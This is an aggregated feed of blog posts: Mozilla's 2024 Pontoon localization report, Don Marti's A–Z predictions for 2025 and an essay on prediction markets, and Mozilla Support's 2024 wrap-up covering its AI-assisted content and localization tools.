Why is it so hard to buy things that work well? (imho Mark Ritson still explained it best—companies over-emphasize the promotion P of marketing, trying to find people slightly more likely to buy the product as is, over the product refinements that would tend to get more buyers. George Tannenbaum on destroying brand trust with too much of one P, too little of another: Ad Aged: Leave Me Alone.)

Why Big Business May Wind Up Missing Lina Khan

An ad giant wants to run your next TV’s operating system

Yes, your phone is tracking you via advertising ID, and companies are using it to sell your location and identity to anyone. Protect yourself by disabling this feature on your device.

Meta beats suit over tool that lets Facebook users unfollow everything (I guess now it turns out you can’t unfollow the AI bots anyway?)

Sweet Dreams and Sour Deals: How White-Noise Apps Are Playing Advertisers

NFL Player Uses Pirate Streaming Site to Watch His Own Team

Missouri AG claims Google censors Trump, demands info on search algorithm

Ex-coiner Y Combinator startup bro: ‘dawg i chatgpt’d the license, can’t be bothered with legal’

Steam adds the harsh truth that you’re buying “a license,” not the game itself

Mozilla Localization (L10N): Mozilla Localization in 2024

A Year in Data

2024 was a year with plenty of achievements for the Mozilla localization community (here’s the 2023 report in case you missed it, or want to check how we fared against our original plans). Let’s start with the numbers first:

  • 30 projects (-2 compared to last year) and 369 locales (+111) set up in Pontoon.
  • 4,991 new user registrations
  • 1,202 active users, submitting at least one translation (on average 222 users per month)
  • 466,187 submitted translations
  • 385,722 approved translations
  • 20,931 new strings to translate

While the overall number of projects decreased, this is mostly due to removal of obsolete projects (we actually added a new one in November). The astounding increase in the number of locales is driven once again by Common Voice, which has 318 locales enabled in Pontoon.
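As a quick sanity check on the figures above, the ratio of approved to submitted translations works out to a bit under 83% (a small illustrative calculation based on the report's own numbers, not part of the original post):

```python
# Figures taken from the bullet list above.
submitted = 466_187
approved = 385_722

approval_rate = approved / submitted
print(f"{approval_rate:.1%}")  # roughly 82.7% of submitted translations were approved
```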

Thank you to all the volunteers who contributed their time, passion, and expertise to Mozilla’s localization over the last 12 months.

Pontoon Development

At the start of the year, we focused on improving Pontoon’s performance — a less glamorous but essential part of maintaining an effective platform: if the platform doesn’t perform well, users can quickly lose motivation and stop contributing. To assess the current state, we used the Apdex score, a standard measure of user satisfaction for web application performance. Between January and March, we successfully raised the average score for our lowest performing transactions from 0.77 to 0.87, making significant progress toward achieving what is considered a “good” performance level. Later in the year, we also moved to a larger database plan to further improve performance.
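The Apdex score mentioned above has a standard definition: samples at or under a target threshold count as "satisfied", samples up to four times the threshold count half as "tolerating", and slower samples count not at all. A minimal sketch of the calculation (the 0.5s threshold is illustrative, not Pontoon's actual configuration):

```python
def apdex(response_times, t=0.5):
    """Apdex = (satisfied + tolerating / 2) / total samples.

    A sample is 'satisfied' at or under the target threshold t,
    'tolerating' between t and 4t, and 'frustrated' above 4t.
    """
    satisfied = sum(1 for rt in response_times if rt <= t)
    tolerating = sum(1 for rt in response_times if t < rt <= 4 * t)
    return (satisfied + tolerating / 2) / len(response_times)

# Example: 6 fast requests, 2 tolerable ones, 2 slow ones.
times = [0.2, 0.3, 0.4, 0.1, 0.45, 0.5, 1.0, 1.5, 2.5, 3.0]
print(apdex(times))  # (6 + 2/2) / 10 = 0.7
```

A score of 1.0 means every request was fast; 0.85 or above is conventionally considered "good", which is what the 0.77 to 0.87 improvement above is measured against.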

Animated GIF showing Pontoon's LLM integration in the machinery tab.

In May, we launched our first LLM integration. Users now have additional options if they’re not satisfied with the suggestion provided by Google Translate. They can choose from three actions: Rephrase, to generate an alternative version; Make formal, to adjust the tone to a more formal register; and Make informal, to create a more casual version. These options are especially valuable for languages like German or Spanish, where tone can significantly impact translation quality and consistency.

Between May and December 2024, this feature has been used 2,571 times across 69 locales, with approximately 35% of the generated text being copied into the editor. This adoption rate suggests that the feature is delivering good-quality results and meeting user needs effectively, and that we should look into expanding its use.

Screenshot of Pontoon advanced search options.

In October, we introduced advanced search options, giving users more flexibility and precision in finding the content they need. By default, Pontoon now searches through source text, approved translations, and pending suggestions. However, users still retain the option to expand their search to include identifiers, rejected translations, or further refine results by matching case or whole words.

For more details on how to use this feature, check out our documentation. We’re currently analyzing the usage data to understand if we should change the default options, and exploring how to make the feature more discoverable.

Screenshot of translation memory management in Pontoon.

December was an especially busy month for releasing new features. We kicked things off with the long-awaited ability to edit translation memory (TM) entries, addressing one of the most frequently requested enhancements from our users. Shortly after, we introduced another powerful feature: the ability to upload custom translation memories in TMX format, giving locales even more control over their localization workflows.

Image showing achievement badges available in Pontoon.

We also launched our first glimpse of gamification! Users can now earn three different types of badges for translating, reviewing, and promoting other contributors. The goal isn’t just to recognize and celebrate the invaluable efforts of volunteers but also to encourage positive behaviors. These include reviewing others’ work and promoting promising contributors, helping communities grow and encouraging effective participation across the platform.

Available user banners in Pontoon.

As part of this work we also introduced user banners to help clarify roles within a locale or project.

Finally, we wrapped up the year by enhancing Pontoon’s ability to keep users informed. Users can now opt to receive notifications via email, choosing between daily or weekly updates. Additionally, we introduced a Monthly Activity Summary — a digest that highlights both their personal contributions and their team’s activity. If you’re a locale manager, we highly recommend enabling this feature to stay on top of your community’s progress and engagement.

Email options in Pontoon's profile settings.

If you check your settings, you’ll find a new option for News and Updates. We highly encourage users to enable this checkbox to stay informed about online events, new features, surveys, and more. The content will be strictly focused on Mozilla Localization and Pontoon, and you can opt out or change your preferences at any time.

Lastly, a lot of work happened behind the scenes to improve Pontoon’s functionality and stability. We introduced the Messaging Center, a new feature that enables program managers to communicate with users more effectively through targeted notifications or emails.

In addition, we’ve been rewriting the code responsible for syncing Pontoon with repositories. This foundational work lays the groundwork for a broader set of initiatives planned for 2025. We also implemented measures to mitigate DDoS attacks, ensuring the platform remains stable, secure, and reliable for all users.

Community

This year, we collaborated with members of the community and other community-focused teams at Mozilla to improve our existing documentation and create comprehensive community guidelines aimed at building vibrant and sustainable communities. These guidelines address key topics, such as the expectations for managers and translators, and provide clear processes for assigning permissions to new contributors when existing leaders are not available.

Unfortunately, the situation around in-person community events hasn’t changed. We know how important these gatherings are for you — and for us — but in the meantime, we continued to focus on organizing online events. You can find all the recordings for the 2024 events here. We’ve also recorded an Introduction to Pontoon, designed to help onboard new contributors and familiarize them with the platform.

What’s coming in 2025

While we made significant strides in improving Pontoon’s performance this year, we believe that we’ve reached the limits of our current setup. As we move into the new year, our focus will shift to exploring alternative deployment solutions. Our goal is to make Pontoon faster, more reliable, and better equipped to meet the needs of our users.

We aim to make mobile projects (Android and iOS) first-class citizens in our localization ecosystem. The first step is introducing support for plural forms, which will significantly enhance the localizability of these projects. This improvement will enable more natural-sounding content in English and other languages, ensuring a better experience for both contributors and end users.

Speaking of Pontoon, we’re committed to improving translation memory utilization, particularly for handling multi-value strings commonly found in Fluent. Currently, Pontoon only suggests translations for a single value within these strings. Moving forward, we aim to provide suggestions or translation memory matches for entire strings, ensuring a more comprehensive and efficient translation experience.
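For readers unfamiliar with Fluent, a multi-value string is a message that carries attributes alongside its main value; a hypothetical example (illustrative, not taken from any Mozilla project):

```fluent
# One Fluent message with a main value and two attributes.
# Matching translation memory against the whole message,
# rather than one value at a time, is the goal described above.
login-button = Sign in
    .title = Sign in to your account
    .aria-label = Sign in
```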

We plan to work on a Mozilla Language Portal — a unified hub that highlights Mozilla’s unique approach to localization while serving as a comprehensive resource for translators. This webpage will feature searchable translation memories, a rich repository of documentation, best practices, blogs, and more, fostering knowledge-sharing and collaboration across the global translation community.

Finally, we will continue exploring innovative ways to engage our community and strengthen its connections. As part of this work, we will keep advocating for increased investment in community building at the organization level, emphasizing its critical role in driving our mission forward.

If you have any thoughts or ideas about this plan, let us know on Mastodon or Matrix!

Thank you!

As we step into 2025, we’re constantly reminded of the transformative power of localization. Together, we’ll continue to break down barriers, and create a digital world that speaks everyone’s language. Thank you for being part of this journey.

Don Marti: predictions for 2025

(looks like I had enough notes for an upcoming event to do A-Z this year…)

Ad blocking will get bigger and more widely reported on. Besides the usual suspects, the current wave of ad blocking is also partly driven by professional, respectable security vendors. Malwarebytes Labs positions their ad blocker as a security tool, and certain well-known companies are happy to help them with their content marketing by running malvertising. (example: Malicious ad distributes SocGholish malware to Kaiser Permanente employees) Silent Push is another security vendor helping to make the ads/malware connection. And, according to research by Lin et al., users who installed an ad blocker reported fewer regrets with purchases and an improvement in subjective well-being. Some of those users who installed an ad blocker reluctantly because of security concerns will be hard to convince to turn it off even if the malvertising situation improves.

Bullshit is going to be everywhere, and more of it. In 2025 it won’t be enough to just ignore the bullshit itself. People will also have to ignore what you might think of as a bullshit Smurf attack, where large amounts of content end up amplifying a small amount of bullshit. Some politician is going to tweet something about how these shiftless guys today need to pull up their pants higher, and then a bunch of mainstream media reporters are going to turn in their diligently researched 2000-word think pieces about the effect of higher pants on the men’s apparel market and human reproductive system. And by the time the stories run, the politician has totally forgotten about the pants thing and is bullshitting about something else. The ability to ignore the whole cycle will be key. So people’s content discovery habits are going to change, we just don’t know how.

Chrome: Google will manage to hang on to their browser, as prospective buyers don’t see the value in it. Personally I think there are two logical buyers. The Trade Desk could rip out the janky Privacy Sandbox stuff and put in OpenPass and UID2. Not all users would leave those turned on, but enough would to make TTD the dominant source for user identifiers in web ads. Or a big bank could buy Chrome as a fraud protection play and run it to maximize security, not just ad revenue. At the scale of the largest banks, protecting existing customers from Internet fraud would save the bank enough money to pay for browser development. Payment platform integration and built-in financial services upsell would be wins on top of that.

Both possible Chrome buyers would be better off keeping open-source Chromium open. Google would keep contributing code even if they didn’t control the browser 100%. They would feel the need to hire or sponsor people to participate on a legit open-source basis to support better interoperability with Google services. They wouldn’t be able to get the anticompetitive shenanigans back in, but the legit work would continue—so the buyer’s development budget would be lower than Google’s, long term. But that’s not going to happen. So far, decision makers are convinced that the only way to make money with the browser is with tying to Google services, so they’re going to pass up this opportunity.

Development tools will keep getting more AI in them. It will be easier to test new AI stuff in the IDE than to not test it. But a flood of plausible-looking new code that doesn’t necessarily work in all cases or reflect the unwritten assumptions of the project means a lot more demand for testing and documentation. The difference between a software project that spends 2025 doing self-congratulatory AI productivity win blog posts and one that has an AI code catastrophe is going to be how much test coverage they started with or were able to add quickly.

Environmental issues: we’re in for more fires, floods, and storms. Pretty much everybody knows why, but some people will only admit it when they have to. A lot of homeowners won’t be able to renew their insurance, so will end up selling to investors who are willing to demolish the house and hold the land for eventual resale. More former house occupants will pivot to #vanlife, and 24-hour health clubs will sell more memberships to people who mainly need the showers.

Firefox will keep muddling through. There will be more Internet drama over their ill-advised adfraud in the browser thing, but the core software will be able to keep going and even pick up a few users on desktop because of the ad blocking trend. The search ad deal going away won’t have much effect—Google pays Firefox to exist and limit the amount of antitrust trouble it’s in, not for some insignificant number of search ad clicks. If they can’t pay Firefox for default search engine placement, they’ll find some other excuse to send them enough cash to keep going. Maybe not as high on the hog as they have been used to, but enough to keep the browser usable.

Google Zero, where Google just stops sending traffic to a site, will arrive for a significant minority of sites. But not even insiders at Google know which. (I Attended Google’s Creator Conversation Event, And It Turned Into A Funeral | GIANT FREAKIN ROBOT, Google, the search engine that’s forgotten how to search)

Homeschooling will increase faster because of safety concerns, but parents will feel uncomfortable about social isolation and seek out group activities such as sports, crafts, parent-led classes, and group playdates. Homeschooling will continue to be a lifestyle niche that’s relatively easy to reach with good influencer and content creator connections, but not well-covered by the mainstream media.

Immigration into the USA will continue despite high-profile deportations and associated human rights violations. But whether or not a particular person is going to be able to make it in, or be able to stay, is going to be a lot less predictable. If you know who the person is who might be affected by immigration policy changes, you might be able to plan around it, but what’s more likely from the business decision-making point of view is the person affected is an employee of some supplier of your supplier, or a family member, and you can’t predict what happens when their life gets disrupted. Any company running in lean or just-in-time mode, and relying on low disruption and high predictability, will be most at a disadvantage. Big Tech companies will try to buy their way out of the shitstorm, but heavy reliance on networks of supplier companies will mean they’re still affected in hard-to-predict ways.

Journalism will continue to go non-profit and journalist-owned. The bad news is there’s not enough money in journalism, now or in the near future, to sustain too many levels of managers and investors, and the good news is there’s enough money in it to keep a nonprofit or lifestyle company going. (Kind of like tech conferences. LinuxWorld had to support a big company, so wasn’t sustainable, but Southern California Linux Expo, a flatter organization, is.)

Killfile is the old Usenet word for a blocklist, and I already had something for B. The shared lists that are possible with the Fediverse and Bluesky are too useful not to escape into other categories of software. I don’t know which ones yet, but a shared filter list to help fix the search experience is the kind of thing we’re likely to see. People’s content discovery and shopping habits will have to change, we just don’t know how.

Low-trust society will trend. It’s possible for a country to move from high trust to low, or the other way around, as the Pew Research Center covered in 2008. The broligarchy-dominated political and business environment in the USA, along with the booms in growth hacking and AI slop, will make things a lot easier for corporate crime and scam culture. So people’s content discovery and shopping habits will have to change, we just don’t know how. Multi-national companies that already operate in middle-income low-trust countries will have some advantages in figuring out the new situation, if they can bring the right people in from there to here.

Military affairs, revolution in: If you think AI hype at the office in the USA is intense, just watch the AI hype in Europe about how advanced drones and other AI-enabled defense projects can protect countries from being occupied by an evil dictator without having to restore or expand conscription. Surveillance advertisers and growth hackers in the USA are constantly complaining about restrictions on AI in Europe—but the AI Act over there has an exception for the defense industry. In 2025 it will be clear that the USA is over-investing in bullshit AI and under-investing in defense AI, but it won’t be clear what to do about it. (bonus link: The Next Arsenal of Democracy | City Journal)

Neighborhood organizations: As Molly White recommended in November, more people will be looking for community and volunteer opportunities. The choice to become a joiner and not just a consumer in unpredictable times is understandable and a good idea in general. This trend could enter a positive feedback loop with non-profit and journalist-owned local news, as news sites try more community connections like Cleveland Documenters.

Office, return to: Companies that are doing more crime will tend to do more RTO, because signaling loyalty is more important than productivity or retaining people with desired skills. Companies that continue avoiding doing crimes, even in what’s going to be a crime-friendly time in the USA, will tend to continue cutting back on office space. The fun part is that the company can tell the employee that work from home privileges are a benefit, and not free office space for the employer. Win-win! So the content niche for how-tos on maximizing home (and van) offices will grow.

Prediction markets will benefit from 2024’s 15 minutes of fame to catch on for some niche corporate projects, and public prediction market prices will be quoted in more news stories.

Quality, flight to (not): If I were going to be unrealistically optimistic here, I’d say that the only way for advertisers to deal with the flood of AI slop sites and fake AI users is to go into full Check My Ads mode and just advertise on known legit sites made by and for people. But right now the habits and skills around race-to-the-bottom ad placements are too strong, so there won’t be much change on the advertiser side in 2025. A few forward-thinking advertisers will get good results from quality buying for specific campaigns, but that’s about it.

Research on user behavior will get a lot more important. The AI crapflood and resulting search quality crisis mean that (say the line, Bart) people’s content discovery and shopping habits will have to change, we just don’t know how. Companies that build user research capacity, especially in studying privacy users and the gaps they leave in the marketing data, will have an advantage.

State privacy law season will be spicy again. A few states will get big comprehensive privacy bills through the process again, but the laws to watch will be specific ones on health, protecting teens from the algorithm, social media censorship, and other areas. More states will get laws like Daniel’s Law. (We need a Daniel’s Law for military personnel, their families, and defense manufacturing workers, but we’re probably going to see some states do them for health insurance company employees instead.) Update 1 Feb 2025: Compliance issues that came up for AADC will have to get another look.

Troll lawyer letters alleging violations of the California Invasion of Privacy Act (CIPA) and similar laws will increase. Operators of small sites can incur a lot of legal risk now just by running a Big Tech tracking pixel. But Big Tech will continue to ignore the situation, and put all the risks on the small site. (kind of like how Amazon.com uses delivery partner companies to take the legal risks of employing algorithmically micromanaged, overstressed delivery drivers.)

Unemployment and underemployment will trend up, not down, in 2025. Yes, there will be more political pressure on companies here to hire and manufacture locally, but actual job applicants aren’t interchangeable worker units in an RTS game—there’s a lot of mismatch between the qualities that job seekers will have and the qualities that companies will be looking for, which will mean a lot of jobs going unfilled. And employers tend to hire fewer people in unpredictable times anyway.

Virginia’s weak privacy law will continue to be ignored by most companies that process personal data. Companies will treat all the privacy law states as Privacyland, USA, which means basically California.

Why is my cloud computing bill so high? will be a common question. But the biggest item on the bill will be the AI that [employee redacted] is secretly in love with, so you’ll never find it.

X-rated sites will face an unfriendly regulatory environment in many states, so will help drive mass-market adoption of VPNs, privacy technologies, cryptocurrencies, and fintech. The two big results will be that first, after people have done all the work to go underground to get their favorite pr0n site, they might as well use their perceived invisibility to get infringing copies of other content too. And second, a lot of people will get scammed by fake VPNs and dishonest payment services.

Youth privacy laws will drive more investment in better content for kids. (This is an exception to the Q prediction.) We’re getting a bunch of laws that affect surveillance advertising to people under 18. As Tobias Kircher and Jens Foerderer reported, in Ban Targeted Advertising? An Empirical Investigation of the Consequences for App Development, a privacy policy change tended to drive a lot of Android apps for kids out of the Google Play Store, but the top 10 percent of apps did better. If you have ever visited an actual app store, it’s clear that Sturgeon’s law applies, and it’s likely that the top 10 percent of apps account for almost all of the actual usage. All the kids privacy laws and regs will make youth-directed content a less lucrative play for makers of crap and spew who can make anything, leaving more of the revenue for dedicated and high-quality content creators.

ZFS will catch on in more households, as early adopters replace complicated streaming services (and their frequent price increases and disappearing content) with storage-heavy media PCs.

Don MartiHow we get to the end of prediction market winter

Taylor Lorenz writes, in Prediction markets go mainstream,

Prediction markets—platforms where users buy and sell shares based on the probability of future events—are poised to disrupt the media landscape in 2025, transforming not only how news is shared but how it is valued and consumed.

Prediction markets did get some time in the spotlight this year. But the reasons for the long, ongoing prediction market winter are bigger than just prediction markets not being famous. Prediction markets have been around for a long time, and have stubbornly failed to go mainstream.

The first prediction market to get famous was the University of Iowa’s Iowa Electronic Markets which launched in the late 1980s and has been covered in the Wall Street Journal since at least the mid-1990s. They originally used pre-web software and you had to mail in a paper check (update 4 Jan 2024: paper checks are still the only way to fund your account on there). But IEM wasn’t the first. Prof. Robin Hanson, in Hail Jeffrey Wernick, writes about an early prediction market entrepreneur who started his first one in 1981. (A secretary operated the market manually, with orders coming in by fax.) Prediction markets were more famous than Linux or the World Wide Web before Linux or the World Wide Web. Prediction markets have been around since before stop trying to make fetch happen happened.

So the safe prediction would be that 2025 isn’t going to be the year of prediction markets either. But just like the year of Linux on the desktop never happened because the years of Linux in your pocket and in the data center did, the prediction markets that do catch on are going to be different from the markets that prediction market nerds are used to today. Some trends to watch are:

Payment platforms: Lorenz points out, Prediction markets are currently in legal limbo, but I’d bet against a ban, especially given the new administration. Right now in the USA there is a lot of VC money tied up in fintech, and a lot of political pressure from well-connected people to deregulate everything having to do with money. For most people the biggest result will be more scams and more hassles dealing with transactions that are legal and mostly trustworthy today but that will get enshittified in the new regulatory environment. But all those money-ish services will give prediction markets a lot more options for getting money in and out in a way that enables more adoption.

Adding hedging and incentivization: The prediction markets that succeed probably won’t be pure, ideal prediction markets, but will add on some extra market design to attract and retain traders. Nick Whitaker and J. Zachary Mazlish, in Why prediction markets aren’t popular, write that so far, prediction markets don’t appeal to the kinds of people who play other kinds of markets. People enter markets for three reasons. Savers are trying to build wealth, Gamblers play for thrills, and Sharps enter to profit from less well-informed traders. No category out of the three is well-served by existing prediction markets, because a prediction market is zero-sum, so not a way to build wealth long-term, and it’s too slow-moving and not very thrilling compared to other kinds of gambling. And the sharps need a flow of less well informed traders to profit from, but prediction markets don’t have a good way to draw non-sharps into the market.

Whitaker and Mazlish do suggest hedging as a way to get more market participants, but say

We suspect there is simply very little demand for hedging events like whether a certain law gets passed; there is only demand for hedging the market outcomes those events affect, like what price the S&P 500 ends the month at. Hedging market outcomes already implicitly hedges for not just one event but all the events that could impact financial outcomes.

That’s probably true for hedging in a large public prediction market. An existing oil futures market is more generally useful to more traders than a prediction market on all the events that might affect the price of oil. And certain companies’ stocks today are largely prediction markets on future AI breakthroughs and the future legal status of various corporate crimes. But I suspect that it’s different for a private market for events within a company or organization. For example, a market with sales forecasting contracts on individual large customers could provide much more actionable numbers to management than just trading on predicted total sales.

You could, in effect, pay for a prediction market’s information output by subsidizing it, and Whitaker and Mazlish suggest this. A company that runs an internal prediction market can dump money in and get info out. Like paying for an analyst or consulting firm, but in a distributed way where the sources of expertise are self-selecting by making trade/no trade decisions based on what they know or don’t know. But it’s also possible, usually on the smaller side, for a prediction market to become an incentivization market. To me, the difference is that in an incentivization market, a person with ability to affect the results holds a large enough investment in the market that it influences them to do so. The difference is blurry and the same market can be a prediction market for some traders and an incentivization market for others. But by designing in incentives for action, a market operator can make it drift away from a pure prediction market design to one that tends to produce an outcome. related: The private provision of public goods via dominant assurance contracts by Alexander Tabarrok

Proof of concept projects can already address specific information needs: A problem that overlaps with the prediction market incentivization problem in interesting ways is the problem of how to pay for information products and services that can be easily copied. How do we fund open source? is a persistent question. And Bruce Perens, original author of what became the Open Source Definition, wants to move on entirely. The problem of funding open source is hard enough that we mainly hear about it when a high-profile security issue makes the news.

As Luis Villa points out,

If you don’t know what’s in the box, you can’t secure it, so it is your responsibility as builders to know what’s in the box. We need better tools, we need better engagement to enable everybody to do that with less effort and less burden on individual volunteer maintainers and non-profits.

Companies that use open source software need to measure and reduce risks. The problem is that the biggest open source risks are related to hard-to-measure human factors like developer turnover and burnout. Developers of open source software can take actions that help companies understand their risks, but they’re not compensated for doing it. A prediction/incentivization market can both help quantify hidden risks and incentivize changes.

If you have an internal market that functions as both a prediction market and an incentivization market, you can subsidize both the information and the desired result by predicting the events that you don’t want to happen. This is similar to how commodities markets and software bug futures markets can work. Some traders are pure speculators, others take actions that can move the market. Farmers can plan which crops to plant based on predicted or contracted prices, companies can allocate money to fuel futures and/or fuel-saving projects, developers can prioritize tasks.
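The bug-futures version of this can be sketched as a tiny binary market. Everything below is hypothetical and for illustration only; the class, side names, and pro-rata payoff rule are made up, not any real market's API:

```python
# Minimal sketch of a binary "bug futures" contract (hypothetical).
# A FIXED position pays off if the bug is fixed by the deadline,
# an UNFIXED position pays off otherwise. An operator who wants the
# bug fixed subsidizes the UNFIXED side: whoever fixes the bug can
# back FIXED and collect the pot, so the subsidy doubles as a bounty.

from dataclasses import dataclass, field


@dataclass
class BugFuture:
    bug_id: str
    positions: dict = field(
        default_factory=lambda: {"FIXED": {}, "UNFIXED": {}}
    )

    def buy(self, trader: str, side: str, stake: float) -> None:
        book = self.positions[side]
        book[trader] = book.get(trader, 0.0) + stake

    def resolve(self, fixed: bool) -> dict:
        """Split the whole pot among the winning side, pro rata by stake."""
        pot = sum(sum(book.values()) for book in self.positions.values())
        winners = self.positions["FIXED" if fixed else "UNFIXED"]
        total = sum(winners.values())
        return {trader: pot * stake / total for trader, stake in winners.items()}


market = BugFuture("BUG-1234")
market.buy("operator", "UNFIXED", 90.0)   # subsidy: bet on the bad outcome
market.buy("developer", "FIXED", 10.0)    # developer backs their own fix
print(market.resolve(fixed=True))         # {'developer': 100.0}
```

The point of the design is visible in the payout: the operator's 90 on UNFIXED becomes the developer's winnings once the fix lands, which is the incentivization half of the prediction/incentivization split described above.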

Synergy with AI projects: An old corporate Intranet rule of thumb [citation needed] is that you need five daily active editors to have a useful company or organization Wiki. I don’t know what the number is for a prediction market, but as Prof. Andrew Gelman points out, prediction markets need “dumb money” to create incentives for well-informed traders to play and win.

Noisy, stupid bots are a minus for most kinds of social software, but a win for markets. If only there were some easy way to crank up a bunch of noisy, stupid bots. Oh, wait, there’s a whole AI boom happening. Good timing, right? And AI projects need ways to test their output quality in a scalable way, just as much as prediction markets need extra trading churn. AI projects and prediction market projects solve each other’s problems.

  • Prediction markets need liquidity and dumb money. Bots can already provide both.

  • AI projects need scalable quality checks. Slop is easier to make than to check, so the cost of evaluating the quality of AI output keeps growing relative to the declining costs of everything else. You can start up a lot of bots, fund each with a small stake, and shut down the broke ones. The only humans required are the traders who can still beat the bots. And if at some point the humans lose all their money, you know you won AI. Congratulations, and I for one welcome our bot plutocrat overlords.

Bots can also be run behind a filter to only make offers that, if accepted, would further the market operator’s goals in some way. For example, bots can be set up to be biased to over-invest on predicting unfavorable outcomes (like buying the UNFIXED side of bug futures) to add some incentivization.
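A minimal sketch of that filter idea, with all names and numbers invented for illustration: a noisy bot proposes random offers, and a goal filter passes through (and over-weights) only the offers that tilt the book toward the operator's preferred outcome.

```python
import random

# Sketch of a filtered liquidity bot (hypothetical design, not a real
# trading API). The bot proposes naive random offers; the filter lets
# favored-side offers through at a larger stake and keeps only small
# offers on the other side, so the book tilts toward the operator's goal
# (here, buying UNFIXED to subsidize anyone who can fix the bug).

def noisy_bot(rng: random.Random, n: int):
    """Generate n naive offers as (side, stake) pairs."""
    for _ in range(n):
        yield (rng.choice(["FIXED", "UNFIXED"]), round(rng.uniform(1, 10), 2))

def goal_filter(offers, favored_side: str = "UNFIXED", bias: float = 2.0):
    """Scale up favored-side offers by `bias`; keep only small opposing
    offers so some noise remains for liquidity."""
    for side, stake in offers:
        if side == favored_side:
            yield (side, stake * bias)
        elif stake < 5:
            yield (side, stake)

rng = random.Random(42)
book = list(goal_filter(noisy_bot(rng, 100)))
unfixed = sum(stake for side, stake in book if side == "UNFIXED")
fixed = sum(stake for side, stake in book if side == "FIXED")
print(f"UNFIXED stake {unfixed:.0f} vs FIXED stake {fixed:.0f}")
```

The bias knob is the market-design decision: turn it up and the market drifts from pure prediction toward incentivization, as described above.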

Fixing governance by learning from early market experiences: Internal prediction markets at companies tend to go through about the same story arc. First, the market launches with some sponsorship and internal advocacy from management. Second, the market puts up some encouraging results. (Even in 2002 a prediction market was producing more accurate sales forecasts than the official ones at HP.) And for its final act, the prediction market ends up perpetrating the unforgivable corporate sin: accurately calling some powerful executive’s baby ugly. So the prediction market ends up going to live with a nice family on a farm. Read the (imho, classic) paper, Corporate Prediction Markets: Evidence from Google, Ford, and Firm X by Bo Cowgill and Eric Zitzewitz, and, in Professor Hanson’s post, the story of why a VC firm could not get prediction markets into portfolio companies. Wernick blames the ego of managers who think their own judgment is best, hire sycophants, and keep key org info close to their chests.

The main lesson is that the approval and budget for the prediction market itself needs to be handled as many management levels as possible above the managers that the prediction market is likely to bring bad news to. Either limit the scope of issues traded on, or sell the market to a more highly placed decision maker, or both. The prediction market administrator needs to report to someone safely above the level of the decision-makers for the issues being traded on. The really interesting experiment would be a private equity or VC firm that has its own team drop in and install a prediction market at each company it owns. The other approach is bottom-up: start with limiting the market to predicting small outcomes like the status of individual software bugs, and be disciplined about not trading on more consequential issues until the necessary sponsorship is in place.

So, is 2025 the year of prediction markets? Sort of. A bunch of factors are coming together. Payment platform options, the ability to do proof of concept niche projects, and the good fit as a QA tool for AI will make internal market projects more appealing in 2025. And if market operators can learn from history to avoid what tends to happen to bearers of bad news, this could be the year.

Related

From prediction markets to info finance by Vitalik Buterin

Conditional market: The seer.io prediction market supports conditional positions (that only win or lose if some other position pays off) with an arbitrary number of nesting levels.

Polymarket Explained: How Blockchain Prediction Markets Are Shaping the Future of Forecasting Pavel Naydanov explains implementation details. (An internal prediction market can be a relatively simple CRUD app, though, so lack of this technology was not really holding prediction markets back.)

Bonus links

The History Crisis Is a National Security Problem Democracies such as the United States rely on the public to set broad strategic priorities through elections and on civilian leaders to translate those priorities into executable policies. Fostering historical knowledge in the public at large is also an important aspect of U.S. competitiveness. (and we really don’t want to be learning about history from bots)

Why the deep learning boom caught almost everyone by surprise Fei-Fei Li….created an image dataset that seemed ludicrously large to most of her colleagues. But it turned out to be essential for demonstrating the potential of neural networks trained on GPUs.

“Unprecedented” decline in teen drug use continues, surprising experts (maybe the kids are addicted to video games now?)

Developing a public-interest training commons of books Currently, AI development is dominated by a handful of companies that, in their rush to beat other competitors, have paid insufficient attention to the diversity of their inputs, questions of truth and bias in their outputs, and questions about social good and access. Authors Alliance, Northeastern University Library, and our partners seek to correct this tilt through the swift development of a counterbalancing project…

Support.Mozilla.OrgWrapping up 2024: How SUMO made support smarter, simpler, and more accessible

As 2024 comes to a close, we want to take a moment to celebrate the work we’ve accomplished together at Mozilla Support (SUMO). This year, we focused on making support resources easier to use, smarter to create, and better for everyone. From reducing users’ cognitive load to amplifying their voices through new programs, these wins are a testament to collaboration between our team, contributors, and the wider Mozilla community.

Let’s look back at the highlights.

Making support simpler for everyone

This year, we successfully kicked off the Cognitive Load Reduction initiative. The goal was clear: make Knowledge Base articles easier to follow and less mentally demanding for users. We introduced several improvements.

Right now, SUI screenshots and inline icons and images are the most widely adopted updates. These visual additions have already made a noticeable difference in helping users understand and solve issues faster. Next year, we will continue expanding these improvements to reach even more articles and provide a smoother experience for everyone.

One unified taxonomy to connect the dots

Another big milestone this year was the creation and implementation of a unified taxonomy across Mozilla’s Customer Experience team. A unified taxonomy is a shared structure for classifying things — in our case, everything from knowledge base content to app store feedback and user insights.

Here’s why it matters: With this new system, we can gather consistent and meaningful data about what our users need most. Whether it’s feedback about Firefox in app stores or trends in KB article usage, we’re now able to connect the dots between different channels. This deeper understanding helps us improve Mozilla’s products and continuously refine our support resources to be more useful and relevant.

Amplifying user voices with the Voice of Customer program

This year, we launched our Voice of Customer (VoC) program to ensure the voices of our users are consistently heard across Mozilla. We’re gathering feedback from multiple channels — like app store reviews, Connect, SUMO forums, and surveys — and sharing these insights with the teams that shape Mozilla’s products and support resources.

To take this program even further, we’re customizing our own Gen-AI model to help cross-check user feedback across channels. This will allow us to identify trends more effectively and ensure the insights we share are accurate and actionable. By better connecting what users are saying with what we’re building, we can make Mozilla’s products and our support efforts even more aligned with user needs.

This is an ongoing effort, and we’re excited to see its continued impact in the coming year.

AI tools that make content smarter (and more accessible)

This year, we also explored how AI can improve the way we create, update, and localize content. Two major initiatives have already begun delivering results:

Organa Oracle for content creation and review

Organa Oracle is a custom GPT model built in Mozilla’s OpenAI Workspace, specifically designed to support SUMO’s style, voice, and guidelines. It helps streamline the creation and updating of Knowledge Base articles by:

  • Suggesting formats and approaches that align with SUMO guidelines.
  • Recommending screenshots and generating alt text to keep articles accessible to all users.
  • Reviewing drafts for clarity, tone, and consistency to ensure every article meets our standards.

For now, Organa Oracle is available only to staff, but we’re actively exploring ways to bring it and other similar tools to contributors in the future. These tools could make content creation and updates faster, easier, and even more collaborative while still reflecting the high quality and accessibility users expect from SUMO.

AI-powered L10N

At the same time, we’re using top large language models (LLMs), like Google’s Gemini and OpenAI’s GPT-4o, with carefully designed prompts to assist in the localization process. These tools are built to respect existing translations while improving consistency and efficiency, especially in locales where fewer contributors are active. This initiative is designed to fill gaps and make localization more efficient for everyone.
